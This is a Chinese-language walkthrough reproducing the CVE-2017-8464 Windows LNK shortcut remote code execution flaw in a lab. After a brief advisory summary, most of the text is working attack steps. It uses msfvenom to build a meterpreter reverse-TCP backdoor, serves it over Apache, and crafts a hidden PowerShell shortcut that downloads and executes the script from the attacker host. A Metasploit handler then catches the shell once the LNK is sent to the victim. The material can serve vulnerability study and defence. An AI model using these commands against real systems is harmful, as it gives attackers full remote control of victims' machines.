(CVE-2017-8464)LNK文件(快捷方式)远程代码执行漏洞复现

情报

  北京时间2017年6月13日凌晨,微软官方发布6月安全补丁程序,“震网三代” LNK文件远程代码执行漏洞(CVE-2017-8464)和Windows搜索远程命令执行漏洞(CVE-2017-8543).


CVE-2017-8543,当Windows搜索处理内存中的对象时,存在远程执行代码漏洞。成功利用此漏洞的攻击者可以控制受影响的系统。

CVE-2017-8464,当Windows系统在解析快捷方式时,存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危。


CVE-2017-8464复现过程

  它需要将生成的lnk(快捷方式类型文件)让目标打开(同远控),感觉作为APT攻击还是很吊的一个漏洞。

Kali:192.168.0.101

test PC:192.168.0.103

1.使用msfvenom生成一个msf反弹后门

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=本地IP LPORT=端口号 -f psh-reflection >test.ps1

2.运行apache服务,将生成的test.ps1放到web目录下,让用户可以通过web方式访问。

3.创建一个恶意的powershell快捷方式,名称什么的无所谓。

powershell -windowstyle hidden -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.0.101/test.ps1');xx.ps1

4.使用metasploit模块监听木马脚本

msf > use exploit/multi/handler

msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST 192.168.0.101

msf exploit(handler) > set LPORT 6666

msf exploit(handler) > show options

msf exploit(handler) > run

5.将创建的lnk恶意文件发送到测试机打开。